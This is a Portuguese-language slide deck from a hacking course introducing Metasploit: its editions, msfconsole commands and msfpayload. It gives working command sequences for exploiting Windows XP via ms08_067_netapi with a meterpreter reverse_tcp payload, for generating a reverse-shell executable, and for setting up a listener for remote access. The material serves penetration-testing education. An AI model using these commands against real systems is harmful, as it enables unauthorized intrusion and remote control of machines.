0% acharam este documento útil (0 voto)
4 visualizações15 páginas

Introdução ao Metasploit e Ataques XP

O documento apresenta uma introdução ao Metasploit, ferramenta open source para teste de penetração. São descritas suas definições, versões, uso do msfconsole e msfpayload para realizar ataques, como em Windows XP.

Enviado por

NelsonEry
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd
0% acharam este documento útil (0 voto)
4 visualizações15 páginas

Introdução ao Metasploit e Ataques XP

O documento apresenta uma introdução ao Metasploit, ferramenta open source para teste de penetração. São descritas suas definições, versões, uso do msfconsole e msfpayload para realizar ataques, como em Windows XP.

Enviado por

NelsonEry
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd

O que temos pra hoje?

[Link]

Temas de Hoje:

• Metasploit
• Definição
• Versões
• MSFCONSOLE
• Exercício: Atacando Windows XP através do console
• MSFPAYLOAD
• Exercício: Atacando Windows XP através do MSFPAYLOAD
• Realizando ataques externos
Metasploit

[Link]
Metasploit: Definição

[Link]

O projeto Metasploit foi criado em 2003 por HD Moore e é uma plataforma que
permite a verificação do estado da segurança dos computadores existentes numa
determinada rede, permitindo atacar as falhas de segurança existentes nos mais
diversos softwares.

Este é o melhor conjunto de ferramentas para exploração, sendo atualizadas


diariamente com as mais recentes falhas de segurança identificadas por
profissionais no ramo.

Esta “framework” open source, está em constante transformação, é programada em


Ruby e está organizada em diversos módulos.

São estes módulos que contêm os programas preparados especificamente para


tirarem partido de vulnerabilidades encontradas nos softwares e sistemas
operacionais, permitindo assim a execução de código malicioso e
consequentemente a invasão da máquina.
Metasploit: Definição

[Link]
Metasploit: Definição

[Link]

•Exploit
É um meio pelo qual um atacante consegue explorar uma falha dentro de um
Sistema
•Payload
Um código embutido em um exploit utilizado para definição de pós exploração.
É a ação que será executada pós exploração
•Shellcode
É o código do Payload que é injetado no sistema comprometido através do
exploit.
•Module
Pequenos pedaços de scripts que podem ser utilizados pelo metasploit para
realizar determinadas operações
•Listener
Componente que aguarda uma conexão de retorno pós invasão. Útil para
conexão reversa
Metasploit: Versões

[Link]

Metasploit Express
Teste de Intrusão por linha de comando
Geralmente utilizado em pequenas e médias empresas
$ 5,000

Metasploit PRO
Versão do Metasploit Profissional, Pago!
Aproximadamente $ 11,000

Metasploit Community Edition


Versão gratuita do Metasploit Pro
$ 0,00

Armitage
Uma interface grafica que não foi criada pelos criadores do Metasploit
Metasploit: MSFCONSOLE

[Link]

MSFConsole:
Console do metasploit para facilitação de ataques

Sintaxe:
msfconsole

Opções Básicas:
? – Apresenta o menu de ajuda
Back – Volta um nível
Banner – Apresenta o Banner do Metasploit
Cd – Altera o diretório corrente do Metasploit
Color - Altera a cor do metasploit
Connect – Conecta com outro Host
Edit – Edita o módulo corrente
Exit – Sair do console
Go_pro – Inicia o Metasploit em tela gráfica
Grep – Filtra a saída do comando
Metasploit: MSFCONSOLE

[Link]

Opções Básicas:
Help – Apresenta o menu de ajuda
Info – Apresenta informações sobre um ou mais módulos
Irb – Interpretador de comando Ruby
Jobs – Visualização e gerenciamento de tarefas
Kill – Eliminador de tarefas
Load – Carregador de Framework Plugin
LoadPath – Adicionar caminhos aos módulos
Makerc – Salvar comandos executados desde a inicialização para o arquivo
especificado
Popm – Apresenta o último módulo fora da pilha e o ativa, sem alterar o módulo em
execução
Previous – Define o módulo carregado anteriormente como o módulo atual
Pushm – Empurra os módulos ativos para a pilha
Quit – Sair do console
Reload_all – Recarrega todos os módulos
Resource – Carrega os comandos armazenados em um arquivo
Route – Rotear o tráfego através de uma sessão
Metasploit: MSFCONSOLE

[Link]

Opções Básicas:
Save – Armazena os dados ativos
Search – Procura módulos por nomes e/ou descrições
Sessions – Alterna entre sessões
Set – Seta um valor à uma variável
Setg – Seta um valor à uma variável global
Show – Apresenta módulos de um determinado tipo ou todos os módulos
Sleep – Não faz para durante um número especificado de segundos
Spool – Apresenta no console o conteúdo de um arquivo
Threads – Multiplica o número de requisições/ataques
Unload – Descarregar um framework plugin
Unset – Limpar dados de variáveis
Unsetg – Limpar dados de variáveis globais
Use – Seleciona um módulo pelo nome
Version – Apresenta as versões do framework e o número de bibliotecas
Metasploit: Atacando WINXP

[Link]

Atacando o Windows XP através do Console

• Acessando o console
• msfconsole
• Selecionando o exploit
• use windows/smb/ms08_067_netapi
• Selecionando o Payload
• set PAYLOAD windows/meterpreter/reverse_tcp
• Setando o IP do alvo (Remote Host)
• set RHOST [Link]
• Setando o IP do atacante (Local Host)
• set LHOST [Link]
• Realizando o ataque
• exploit
Metasploit: MSFPAYLOAD

[Link]

MSFPayload:
Ferramenta que gera Shell code executáveis. Pode ser gerado em C, VB, Python,
Ruby, etc.

Sintaxe:
Traz as opções do payload selecionado
msfpayload windows/shell_reverse_tcp O

Exemplo de uso:
Apresenta a lista de payloads existentes
msfpayload –l

Cria um arquivo exe onde ao ser executado irá efetuar uma conexão reversa.
msfpayload windows/shell_reverse_tcp LHOST=[Link] X > [Link]
Metasploit: Atacando WINXP

[Link]

Exemplo de uso:
Cria um arquivo exe onde ao ser executado irá efetuar uma conexão reversa.
msfpayload windows/shell_reverse_tcp LHOST=[Link] X > [Link]

Criando uma conexão reversa:


msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
Metasploit: Realizando ataque externo

[Link]

Realizando ataques externos:

IP FORWARD

[Link] [Link] [Link] [Link]


printf ("\Chega por hoje\n");
[Link]

[Link]

E-mail: [Link]@[Link]

Twitter: @esecuritybr e @desafiohacker

Skype: desafiohacker

Fanpage: [Link]/academiahacker

Você também pode gostar